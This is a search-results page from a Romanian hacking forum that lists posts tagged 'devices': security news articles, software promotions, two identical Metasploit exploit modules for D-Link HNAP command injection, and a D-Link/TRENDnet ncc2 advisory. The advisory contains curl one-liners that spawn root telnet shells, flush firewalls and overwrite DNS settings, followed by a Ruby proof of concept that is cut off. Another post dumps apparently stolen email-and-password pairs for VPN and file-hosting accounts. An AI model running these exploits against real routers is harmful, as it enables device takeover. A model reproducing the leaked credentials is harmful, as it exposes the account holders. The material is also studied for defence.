Jump to content

Search the Community

Showing results for tags 'devices'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 12 results

  1. Kaspersky Total Security 2015 delivers ultimate security for computers & mobile devices. It protects your privacy, finances, identity, photos and children against Internet threats – so no aspect of your digital security is left to chance. One product – with one license – safeguards your ‘digital life’, across your PC, Mac and Android devices. Get it now! Free Kaspersky Total Security 2015 (100% discount) - SharewareOnSale
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  4. Researchers have revealed that Android's 'factory reset' feature doesn't remove all data from devices, leaving up to 500 million users open to attack. The University of Cambridge has revealed that, even with full-disk encryption in play, performing a factory reset on Android smartphones leaves sensitive information up for grabs on the majority of devices. The university examined 21 phones, running Android versions 2.3 to 4.3, and found could up to 500 million Android devices might be at risk of leaving personal data available to attackers after being 'reset.' For example, the researchers found that they were easily able to access the previous owners Gmail account on 80 percent of the devices it tested. "We were able to retrieve the Google master cookie from the great majority of phones, which means that we could have logged on to the previous owner’s gmail account," the researchers said. All of the 21 phones left some sensitive data behind, including information generated by Facebook and WhatsApp, images, videos and text messages. They researchers noted Google's own-brand Nexus firms fared better than those from the likes of HTC and Samsung, but said that all vendors need to do more to protect user data. "The reasons for failure are complex; new phones are generally better than old ones, and Google’s own brand phones are better than the OEM offerings. However the vendors need to do a fair bit of work, and users need to take a fair amount of care." This research follows an investigation carried out back in 2014 which revealed that CEX and Cash Converters have been selling second-hand mobile phones containing sensitive information from their previous owners, despite promising these customers that the phones would be fully wiped before being sold on. In a seperate report, the Cambridge researchers note that such companies could carry out large-scale attacks given the sensitive data they are able to access, made easier by third-party remote wiping service that also fail to clear information from devices. "Antivirus software that relies on a faulty factory reset can only go so far, and there’s only so much you can do with a user process," the researchers said. "These failings mean that staff at firms which handle lots of second-hand phones (whether lost, stolen, sold or given to charity) could launch some truly industrial-scale attacks." These findings could spell bad news for businesses, with Good Technology revealing earlier this month that Android accounted for 26 percent of enterprise smartphone activiations in the first quarter of 2015. Source
  5. Millions of routers and other embedded devices are affected by a serious vulnerability that could allow hackers to compromise them. The vulnerability is located in a service called NetUSB, which lets devices connected over USB to a computer be shared with other machines on a local network or the Internet via IP (Internet Protocol). The shared devices can be printers, webcams, thumb drives, external hard disks and more. NetUSB is implemented in Linux-based embedded systems, such as routers, as a kernel driver. The driver is developed by Taiwan-based KCodes Technology. Once enabled, it opens a server that listens on TCP port 20005 for connecting clients. Security researchers from a company called Sec Consult found that if a connecting computer has a name longer than 64 characters, a stack buffer overflow is triggered in the NetUSB service. If exploited, this kind of vulnerability can result in remote code execution or denial of service. Since the NetUSB service code runs in kernel mode, attackers who exploit the flaw could gain the ability to execute malicious code on the affected devices with the highest possible privilege, the Sec Consult researchers said in a blog post Tuesday. Many vendors integrate NetUSB into their products, but have different names for it. For example, Netgear calls the feature ReadySHARE, while others simply call it print sharing or USB share port. Sec Consult has confirmed the vulnerability in the TP-Link TL-WDR4300 V1, TP-Link WR1043ND v2 and Netgear WNDR4500 routers. However, after scanning firmware images from different manufacturers for the presence of the NetUSB.ko driver, they believe that 92 other products from D-Link, Netgear, TP-Link, Trendnet and ZyXEL Communications are likely vulnerable. The researchers also found references to 26 vendors in the NetUSB.inf client driver for Windows, so they believe many other vendors might also have vulnerable products. They’ve alerted the CERT Coordination Center (CERT/CC), the German CERT-Bund and Austrian CERT, who are working to notify the vendors. On some devices it’s possible for users to disable the feature from the Web-based administration interface or to block access to the port using the firewall feature. However, on some devices, like those made by Netgear, this is not possible, the researchers said. Many devices likely expose the NetUSB service to the local area network only, but there might be implementations that expose it to the Internet as well. Even when restricted to the local network only, the vulnerability still poses a high risk, because attackers can potentially exploit it if they compromise any computer from the local network or if they gain access to the network in some other way—for example, due to weak or no wireless password. As far as the Sec Consult researchers know, only TP-Link has released fixes so far. It has a release schedule for around 40 products. TP-Link, Netgear, D-Link and ZyXEL did not immediately respond to a request for comment. This vulnerability is just the latest in a long stream of basic security flaws found in consumer routers in recent years. “It is safe to say that vulnerability reports like these will continue to appear until a paradigm shift is enacted at the manufacturer level,” said Jacob Holcomb, a security analyst at Baltimore-based Independent Security Evaluators, via email. Holcomb has found many vulnerabilities in routers and other embedded devices over the past several years. Security Evaluators organized a router hacking contest at the DefCon security conference last year. The way in which vendors have implemented NetUSB in their products is egregious, Holcomb said. “For instance, hardcoded AES keys, the processing of unvalidated and untrusted data, and kernel integration are all red flags that should have been identified during the early stages of SDLC [software development lifecycle].” Source
  6. Twitter dau prin pm! proof http://tinypic.com/r/29qfedh/8 http://tinypic.com/r/vsc2tw/8 uploaded.to combo:LittleAmok - 123456 Duration: 1 Week 1 day and 12 hours Points: 7.500 Balance: 0,00 € eMail: LittleAmok@web.d Starter VPN Data Protection: 2325MB / month Devices: 4 of 5 available devices Renewal Date: May 25, 2015 Use On: Windows, OSX, iOS, Android https://masterhunt@hotmail.co.uk:petcorrector@accounts.surfeasy.com/login ..................................... https://karsten1998@live.com:07876363724k@accounts.surfeasy.com/login Starter VPN Data Protection: 1625MB / month Devices: 3 of 5 available devices Renewal Date: June 5, 2015 Use On: Windows, OSX, iOS, Android ................................. https://smeelonig@gmail.com:mysandwich@accounts.surfeasy.com/login Starter VPN Data Protection: 1625MB / month Devices: 1 of 5 available devices Renewal Date: May 11, 2015 Use On: Windows, OSX, iOS, Android ................................... https://www.premiumize.me/account ellyn.fanthome : ellyn.fanthome1 Your account data E-Mail ellyn.fanthome@vsimcard.com Customer ID 276253134 PIN Show PIN Renew Fair use status Green 0% (learn more) Premium status Inactive ............................... Expire_date: 7/7/2015, traffic_left: 3128367965964 http://massimo.bracci@tin.it:massimo58@rapidgator.net/api/user/login? ptidav86 (Déconnexion)|0|? 151.48 GB / ? 198.56 GB |Ratio: 0,76 |Menu http://www.t411.io/ Cam atat pentru azi..
  7. Google said Thursday that malware infections on Android devices have been cut in half in the past year following security upgrades for the mobile platform. In a security review for 2014, Google said it made significant strides for the platform long seen as weak on security. Android security engineer Adrian Ludwig said in a blog post that the overall worldwide rate of potentially harmful applications installed dropped by nearly 50 percent between the first quarter and the fourth quarter of the year. Ludwig noted over one billion Android devices in use worldwide have security through Google Play "which conducts 200 million security scans of devices per day" and that fewer than one percent of the devices had potentially harmful apps installed in 2014. For those devices which only use Google Play apps, the rate of potentially malicious apps was less than 0.15 percent, Google said. The report noted that Android got several security upgrades in 2014, including improved encryption and better detection tools for malware. Android has long been seen as vulnerable to malware because it is an open platform and many devices run older versions of the mobile operating system. But Google's report said its review "does not show any evidence of widespread exploitation of Android devices." "We want to ensure that Android is a safe place, and this report has helped us take a look at how we did in the past year, and what we can still improve on," Ludwig said. "In 2015, we have already announced that we are are being even more proactive in reviewing applications for all types of policy violations within Google Play. Outside of Google Play, we have also increased our efforts to enhance protections for specific higher-risk devices and regions." Android is used on around 80 percent of the smartphones globally, but its popularity has also made it a magnet for malware. Sursa: Google Says Android Malware Cut in Half | SecurityWeek.Com
  8. The Department of Homeland Security sponsored CERT at Carnegie Mellon University on Tuesday released an advisory warning infrastructure providers of a vulnerability in Multicast DNS, or mDNS, that could leak device information that could be leveraged in high volume DDoS amplification attacks. “I would say the most serious concern with a vulnerability like this is abuse for DDoS campaigns, since it’s using UDP (easily spoofable) and the amplification in most cases is well over 100 percent,” said security researcher Chad Seaman, who reported the vulnerability. “We’ve seen a huge surge in the abuse of SSDP devices being used in reflection attacks, this is along the same lines and offers greater amplification, but luckily there aren’t nearly as many vulnerable mDNS devices in the wild.” The advisory lists a number of vendors whose devices are affected, including Canon, HP and IBM among others. Cisco, D-Link and Microsoft devices are in the clear, while whether Apple, a number of Linux distributions, and Dell devices are affected. Mostly, mDNS is used in consumer devices to simplify configuration and integration of services and networking, Seaman said. The issue is that mDNS devices could respond to unicast queries from outside a local link network and those responses could include network and device data that would facilitate a large-scale DDoS attack. According to the advisory, mDNS enables devices on a local link network to discover other services and devices. The fact that some devices would respond to unicast queries from outside goes against the implementation recommendations in RFC 6762. “It’s very easy to abuse. It’s little more than running a standard DNS query for a specific string/service name on port 5353. If you get a reply to the most generic query, the machine is accepting input over the WAN interface that it shouldn’t be,” Seaman said. The leaked information depends on the particular device and how the service it supports is configured. The useful information includes device names, model numbers, serial numbers, network configuration information, and more. “These could be used for social engineering attacks, targeting purposes, reconnaissance purposes, etc.,” Seaman said. The CERT advisory recommends either blocking inbound and outbound mDNS on the WAN, or disabling mDNS services. As with other noteworthy amplification attacks, large amounts of bad traffic is pointed at a specific online service, in most cases, over-running it in short order. “As a reflector it would just be a high number of incoming DNS queries targeted at port 5353, likely from a spoofed source to achieve reflection. As a victim you would see a wide array of replies coming back from various devices,” said Seaman, who has posted sample traffic signatures that would be similar to those used in such an attack. “However because of mDNS explicitly stating it should only operate on port 5353 in the RFC, all requests will be sourced from port 5353 during the reflection. Meaning mitigation should be as simple as blocking port 5353 to protect vulnerable internal devices and drop incoming traffic sourced from port 5353 to help mitigate an attack.” Source
  9. Palo Alto Networks today shared details of a security vulnerability in the Android operating system that could allow an attacker to hijack the installation of a what appears to be a legitimate Android application and modify or replace it with malware. The network security firm said an estimated 49.5 percent of current Android users are impacted by the flaw, which if exploited, could potentially give attackers full access to a compromised device, including usernames, passwords, and sensitive data. Fortunately, the risk for most typical Android users is low, as the vulnerability only affects applications downloaded from third-party app stores, not the official Google Play store, which downloads files into a protected space and cannot be overwritten by an attacker. Discovered by Palo Alto Networks researcher Zhi Xu, the vulnerability exploits a flaw in Android’s “PackageInstaller” system service, allowing attackers to silently gain unlimited permissions in compromised devices, the company said. Android Hijacking VulnerabilityPalo Alto Networks summarized the flaw as follows: • During installation, Android applications list the permissions requested to perform their function, such as a messaging app requesting access to SMS messages, but not GPS location. • This vulnerability allows attackers to trick users by displaying a false, more limited set of permissions, while potentially gaining full access to the services and data on the user’s device, including personal information and passwords. • While users believe they are installing a flashlight app, or a mobile game, with a well-defined and limited set of permissions, they are actually running potentially dangerous malware. “On affected platforms, we discovered that the PackageInstaller has a ‘Time of Check’ to ‘Time of Use’ vulnerability,” the company explained in a blog post. “In layman’s terms, that simply means that the APK file can be modified or replaced during installation without the user’s knowledge. The Installer Hijacking vulnerability affects APK files downloaded to unprotected local storage only because the protected space of Play Store app cannot be accessed by other installed apps.” Palo Alto Networks said it has worked with Google and Android device manufacturers including Samsung and Amazon to help protect users and patch the vulnerability in affected versions of Android, however, some older-version Android devices may remain vulnerable. Palo Alto Networks recommends the following for enterprises concerned about the risk of malware through Android devices: • On vulnerable devices, only install software applications from Google Play; these files are downloaded into a protected space, which cannot be overwritten by the attacker. • Deploy mobile devices with Android 4.3_r0.9 and later, but keep in mind that some Android 4.3 devices are found to be vulnerable. • Do not provide apps with permission to access logcat. Logcat is a system log, which can be used to simplify and automate the exploit. Android 4.1 and later versions of Android by default forbid apps from accessing logcat of system and other installed apps. But an installed app could still manage to get access to other apps’ logcat on rooted mobile devices using Android 4.1 or later. • Do not allow enterprise users to use rooted devices with enterprise networks. According to Google, the Android Open Source Project includes patches for the vulnerability for Android 4.3 and later, which can be found here. According to Google’s Android Security Team, no attempts to exploit the vulnerability on user devices has been detected. Palo Alto Networks also released a vulnerability scanner app in the Google Play store which it has open sourced on Github. Ryan Olson, Unit 42 Intelligence Director at Palo Alto Networks, told SecurityWeek that no CVE has been assigned for the flaw, as Google did not request one. Additional technical details and information are available in the blog post from Palo Alto Networks. Sursa
  10. Ever felt let down by someone who you made a promise, and then broke it? That’s what millions of Android users must be feeling right now when it comes to Google and Android. Last September, Google announced that mobile devices running the new version of Android (5.0, also known as Lollipop) would have full-disk encryption enabled by default. Here is how Google announced the news to the media in a statement: And each of every one of us who cares about security and privacy said, “This is a good thing. Well done Google.” The news of the “encryption-by-default” was reaffirmed in a blog post from Google’s Android team in October last year: It all sounds good, right? Wrong. Because we were a little hasty in breaking open the champagne last year, as Ars Technica has discovered that Google has quietly gone back on its promise and not all new Lollipop devices are going to have encryption by default. It turns out that while Google’s own Nexus 6 and Nexus 9 devices do indeed have encryption enabled by default, other older devices upgraded to Lollipop are not so lucky. Furthermore, brand new third-party Android devices (such as the second-generation Moto E and Galaxy S6 demonstrated at Mobile World Congress in Barcelona) are also not encrypted by default. The discrepancy between what Google said last year and what is now being seen on third-party Android Lollipop devices is explained by the OEM guidelines that manufacturers must follow to have their Lollipop devices approved by Google: In other words, the manufacturer still has a choice whether they currently enable full-disk encryption or not. And performance issues may mean that some third-party Lollipop devices will not yet have encryption by default. Ultimately there was a battle between security and performance. The full-disk encryption may have had too much of a hit on some devices, and so Google – fearing resistance from both customers and manufacturers – made the requirement optional. For now at least. So, if you want your Android to be fully encrypted you will still have to enable the option for yourself. Let’s hope not too many people have been lulled into a false sense of security by Google’s statements of last year. -> Source: Google does a U-turn over Android Lollipop full disk encryption | HOTforSecurity
  11. Product Description With DVR Converter you can convert videos in the formats mpeg/mpg, ts, mod, tod, vro, dvr, pvr, mts, m2ts, tp0 and trp to video streams compatible with WMV, DivX/Xvid/HDX4/MPEG4 (.avi or .mp4), h.264 or MPEG2. This leads to a high compatibility of your digital video recordings. The created files can be processed with almost any other program and played on a large number of hardware players. Features: Conversion of mpeg/mpg, ts, mod, tod, vro, dvr, pvr, mts, m2ts, tp0 and trp video files. mpeg compatible files, made with devices from among the following companies: Digital Everywhere, Opera, Siemens. ts compatible files, made with devices from among the following companies: ABCom, AEG, Anubis, Arcon, Astro, Astrotel, Atevio, beyonwiz, Centarea, Comag, Compro, Conceptronic, Coolstream, Darkbox, DGStation, Digitalbox, Digittrade, Dream Multimedia bzw. Dreambox, DVICO, EasyOne, Ellion, Emtec, Geniatech, Genius, Hauppauge, Humax, Hyro, Icecrypt, icom, Kathrein, KNC ONE, KWorld, Medion, Megasat, Netgear, Octagon, Optibox, Orbitech, Pinnacle, Protek, Rebox, Samsung, Satelco, SetOne, SilverCrest, Sony, Teac, TechniSat, TechnoTrend, Telestar, Terratec, Toshiba, Trekstor, TwinHan, Zyxel. dvr compatible files, made with devices from among the following companies: COMAG, Edision, Imperial, Micro electronic, Pearl, Preisner, Smart, Xoro. pvr compatible files, made with devices from among the following companies: Targa TSR 5100 HDD and ADT. mts compatible files, made with devices from among the following companies: AVCHD compatible cams from e.g. Canon and Panasonic, and devices from Micronik. m2ts compatible files from e.g. Blu-ray discs. tp0 compatible files, made with devices from among the following companies: Topfield, Dick Smith, Homecast, Hyundai, Jepssen, Mascom. trp compatible files, made with devices from among the following companies: ABCom, Arion, BELdigital, CGV, Clarke-Tech, CreNova, DGStation, Dmsis, Edision, GSS, Hirschmann, Intek Digital, Inverto, Kaon, Lyngbox, NanoXX, OPTICUM, Pixx, Quelle or rather Universum, Schwaiger, Sezam. Converts videos to video files compatible with DivX/Xvid, h.264, MPEG2, MP4, DVD, SVCD and WMV. Supports SD and HD as input and output format. Supports PAL and NTSC as input and output format. The video conversion automatically considers the correct aspect ratio. Capable filters ensure optimum results when enlarging or reducing images. Shows resolution, framerate and bitrate of input files. Burning of CDs and DVDs. An integrated player allows watching of all input videos before conversion! -> Download <-Deal Expires in: EXPIRED!
  12. >> D-Link and TRENDnet 'ncc2' service - multiple vulnerabilities Discovered by: ---- Peter Adkins <peter.adkins@kernelpicnic.net> Access: ---- Local network; unauthenticated access. Remote network; unauthenticated access*. Remote network; 'drive-by' via CSRF. Tracking and identifiers: ---- CVE - Mitre contacted; not yet allocated. Platforms / Firmware confirmed affected: ---- D-Link DIR-820L (Rev A) - v1.02B10 D-Link DIR-820L (Rev A) - v1.05B03 D-Link DIR-820L (Rev - v2.01b02 TRENDnet TEW-731BR (Rev 2) - v2.01b01 Additional platforms believed to be affected: ---- D-Link DIR-808L (Rev A) - v1.03b05 D-Link DIR-810L (Rev A) - v1.01b04 D-Link DIR-810L (Rev - v2.02b01 D-Link DIR-826L (Rev A) - v1.00b23 D-Link DIR-830L (Rev A) - v1.00b07 D-Link DIR-836L (Rev A) - v1.01b03 Vendor involvement: ---- 2015-01-11 - Issues reported to D-Link via email (security contact). 2015-01-11 - Issues reported to TRENDnet via support ticket. 2015-01-12 - Initial response from TRENDnet. 2015-01-14 - Initial response from D-Link (security contact). 2015-01-19 - Email to Mitre. 2015-01-19 - TRENDnet request a few days to validate vulnerabilities. 2015-01-26 - TRENDnet confirm vulnerabilities and commit to Feb 10 fix. 2015-02-01 - Initial response from Mitre. 2015-02-04 - Requested an update from D-Link (security contact). 2015-02-10 - TRENDnet release 2.02b01 resolving vulnerabilities. 2015-02-10 - Emailed Mitre requesting follow up. 2015-02-10 - Emailed D-Link requesting follow up (security contact). 2015-02-18 - Emailed D-Link requesting follow up (security contact). 2015-02-21 - Contacted D-Link support as I had not still not heard back. 2015-02-22 - D-Link support were unsure as to my query. 2015-02-22 - Replied to D-Link support clarifying my request. 2015-02-23 - D-Link support directed me to the security reporting guide. 2015-02-26 - Vulnerability published to Bugtraq and GitHub. Mitigation: ---- * Ensure remote / WAN management is disabled on the affected devices. * Only allow trusted devices access to the local network. * If using a listed TRENDnet device, install the patched firmware issued by the vendor. * If using a listed D-Link device, you'll need to use a third party tool such as µBlock (Chrome, Firefox and Safari) to blacklist requests to your router. This isn't ideal, but it's better than the alternative. Notes: ---- * Due to the nature of the the 'ping.ccp' vulnerability, an attacker can gain root access, hijack DNS settings or execute arbitrary commands on these devices with the user simply visiting a web page with a malicious HTTP form embedded (via CSRF). * Due to the location of this issue (ncc / ncc2) these vulnerabilities may be present in other devices and firmware versions not listed in this document. * D-Link initially responded on their security contact within a week. However, after I had provided write ups of these vulnerabilities it went quiet. In over a month I have been unable to get any sort of response from D-Link, including as to whether they have managed to replicate these issues or when there will be a fix. I contacted D-Link support as a last ditch effort to reestablish contact, however I was linked back to the same security reporting process I had followed initially. * Remote execution of these exploits is possible, but requires the device to already have remote / WAN management enabled; except in the case of 'ping.ccp', as above. * If you have a D-Link device that is believed to be affected and can confirm whether the PoC is successful, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings. * A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2 ---- fwupgrade.ccp ---- The ncc / ncc2 service on the affected devices allows for basic firmware and language file upgrades via the web interface. During the operation, a HTTP POST is submitted to a resource named 'fwupgrade.ccp'. The request appears to be executed by the ncc / ncc2 service on the device, which runs as the root user. Unfortunately, the filtering on this resource does not appear to be effective, as: file / MIME type filtering is not being performed; and the 'on-failure' redirection to the login page is being performed AFTER a file has already been written the the filesystem in full. As a result of the above, this resource can be used to upload files to the filesystem of devices running vulnerable versions of ncc / ncc2 without authentication. This is also possible over the internet if WAN / remote management has been previously enabled on the device. To compound the issue, at least in the case of the listed devices, files are written to a ramfs filesystem which is mounted at '/var/tmp'. This becomes an issue as this directory is also used to store volatile system configuration files - as the root filesystem is mounted read-only. The files under '/var/tmp' include 'resolv.conf', allowing for an attacker to hijack a user's DNS configuration: # Overwrite the DNS resolver with Google DNS echo 'nameserver 8.8.8.8' > resolv.conf curl \ -i http://192.168.0.1/fwupgrade.ccp \ -F action=fwupgrade \ -F filename=resolv.conf \ -F file=@resolv.conf ---- ping.ccp ---- The ncc / ncc2 service on the affected devices allow for basic 'ping' diagnostics to be performed via the 'ping.ccp' resource. Unfortunately, it appears that strings passed to this call are not correctly sanitized. Much in the same manner as above, the request appears to be executed by the ncc / ncc2 service on the device, which is run as the root user. The handler for 'ping_v4' does not appear to be vulnerable as this resource maps the components of a IPv4 address, represented by a dotted quad, into a format of '%u.%u.%u.%u' at execution time. However, 'ping_ipv6' references the user provided input directly as a string ('%s'), which is then passed to a system() call. This formatting allows for an attacker to pass arbitrary commands to the device through a HTTP request. As this resource is also able to be accessed without authentication, it provides a vector for an attacker to execute arbitrary commands on the device - including, but not limited to, DNS hijacking and WAN firewall disablement - via CSRF. # Spawn a root shell (telnet) curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(telnetd -l /bin/sh)' # Flush the iptables INPUT chain and set the default policy to ACCEPT. curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(iptables -P INPUT ACCEPT)' curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(iptables -F INPUT)' ---- UDPServer / MP Daemon ---- Note: This vulnerability does not seem to be present in firmware versions before 1.05B03 on the DIR-820LA1. This may differ on other platforms. The ncc / ncc2 service on the affected devices appears to have been shipped with a number of diagnostic hooks available. Unfortunately, much in the same manner as the vulnerabilities discussed above, these hooks are able to be called without authentication. These hooks are also callable via CSRF; although a moot point given that the 'ping.ccp' vulnerability discussed above already yields a higher level of access to the device via the same manner. One of the more 'interesting' hooks exposed by these devices allow for a 'UDPServer' process to be spawned on the device when called. When started this process listens on the devices LAN IP for data on UDP 9034. Unfortunately, this process does not appear to perform any sort of input sanitization before passing user input to a system() call. Further investigation finds that the source for this service (UDPServer) is available in the RealTek SDK, and appears to be a diagnostic tool. As a result of the above, this process is vulnerable to arbitrary command injection. # Spawn a root shell (telnet) curl -i 192.168.0.1/test_mode.txt echo "\`telnetd -l /bin/sh\`" > /dev/udp/192.168.0.1/9034 ---- Diagnostic hooks ---- Further to the 'test_mode' hook discussed above, the ncc / ncc2 service on the affected devices appear to have been shipped with a number of other diagnostic hooks enabled by default: * tftpd_ready.txt * chklst.txt * wps_default_pin.txt * usb_connect.txt * wps_btn.txt * reset_btn.txt * reboot_btn.txt * calibration_ready24G.txt * calibration_ready5G.txt * restore_default_finish.txt * set_mac_finish.txt * test_mode.txt * wifist.txt These resources do not exist on the filesystem of the device, nor do they appear to be static. Instead, these files appear to be rendered when queried and can be used to both interrogate the given device for information, as well as enable diagnostic services on demand. Unfortunately, these hooks are able to be queried without any form of authentication, and are accessible by attackers on the local network, and over the internet via WAN management (if enabled), and CSRF. A brief descriptions for each of these hooks is provided below. Those not listed provide either unknown functionality, or binary values which appear to represent system GPIO states (*_btn.txt). - tftp_ready.txt When queried, this resource spawns a tftp daemon which has a root directory of '/'. As TFTP requires no authentication, this service can be used to extract credentials from the device or even download files from an external storage device connected via USB. Unfortunately, due to the way this data is stored on the system, all credentials appear to be available in plain-text. These credentials can include (depending on the vendor and device configuration): * GUI / Device management credentials * Samba credentials * PPPoE credentials * Email credentials * 'MyDlink' credentials (on D-Link devices) - chklst.txt When queried, this resource will return the following information: * Current WLAN SSIDs * Current WLAN channels * LAN and WAN MAC addressing * Current Firmware version information * Hardware version information * Language information - wps_default_pin.txt When queried, this resource will return the default / factory WPS pin for the device. - usb_connect.txt When queried, this resource will return a binary value which indicates whether an external device is connected to the USB port on the device - or null in the case of devices that do not have an exposed USB port. This resource could potentially by used by an attacker to enumerate devices with USB storage attached. ---- Ruby PoC ---- # NCC2 PoC. require 'pp' require 'optparse' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.0.1" options[:port] = 80 OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.parse! end # Define which SOAPActions we will be using. actions = [ { :name => "Get device information", :call => "sloppy_parser", :path => "chklst.txt", }, { :name => "Has USB device connected", :call => 